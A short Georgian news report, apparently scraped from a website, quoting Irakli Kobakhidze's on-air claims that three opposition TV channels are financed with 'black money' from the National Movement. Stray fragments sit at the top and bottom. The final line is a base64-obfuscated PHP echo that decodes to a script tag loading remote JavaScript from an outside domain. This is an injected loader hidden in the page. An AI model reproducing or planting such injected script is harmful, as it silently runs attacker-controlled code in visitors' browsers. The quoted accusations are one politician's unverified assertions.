celsiusi
ავერსი შნაიდერი
პარტია "ქართული ოცნების" თავმჯდომარემ ირაკლი კობახიძემ "პალიტრანიუსის" ეთერში, კრიტიკულ ტელევიზიებზე საუბრისას განაცხადა, რომ ეს მედიასაშუალებები "შავი ფულით" ფინანსდებიან. 
 
„სამივე ტელევიზიასთან მიმართებით არსებობს არა მხოლოდ საკუთრებითი ინტერესი, სამივეს პირდაპირ აფინანსებს ნაციონალური მოძრაობა შავი ფულით, ხალხისგან ნაძარცვი, სისხლიანი ფულით. „ფორმულას“ აფინანსებს კეზერაშვილი, „მთავარს“ აფინანსებს „ნაცმოძრაობა“, ნაყოფია, კეზერაშვილიც ეხმარება პერიოდულად, რაც შეეხება „ტელეკომპანია პირველს“, ძალიან მარტივად ვიცით ფაქტები, მათ შორის, ვის, როდის, რა კონვერტი ჩამოუტანეს, შავი ფული, ეს ყველაფერი ვიცით, მაგალითად, ჭუტას რა ფული მისცეს, გრიგოლიას რა ფული მისცეს და ა.შ...
 
მათ შორის, ხელფასები რომ კონვერტებით რიგდება, არ ვიცი, შეიძლება, ესეც კრიმინალია, მაგრამ მე ამაში ვერ ჩავერევი. მოძრაობს შავი ფული, ნაძარცვი ფული, ხალხს რაც მოჰპარეს 2004-12 წლებში, ის ფული ტრიალებს ამ ტელევიზიებში.
 
25 მილიონი ლარი არის ამ სამი ტელევიზიის სარეკლამო შემოსავალი, ხარჯები არის სამჯერ მეტი, დაახლოებით. საიდან ფინანსდებიან? ამიტომ არიან ნაცმოძრაობის კუთვნილი ტელევიზია სამივე.
 
არ ვიცი, შეიძლება, ეს არის საგადასახადო დანაშაული, ამას მე კვალიფიკაციას ვერ მივცემ, ეს არის საგამოძიებო ორგანოების საქმე. აქ რომ შევიდეს საგამოძიებო ორგანო, მერე შეიძლება ფოტიგას და ვიოლა ფონ კრამონს კითხვები გაუჩნდეთ, რომ ე.წ. ოპოზიციური არხებით დაინტერესდნენ სამართალდამცავები"– განაცხადა კობახიძემ. 
 
 
 
600
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");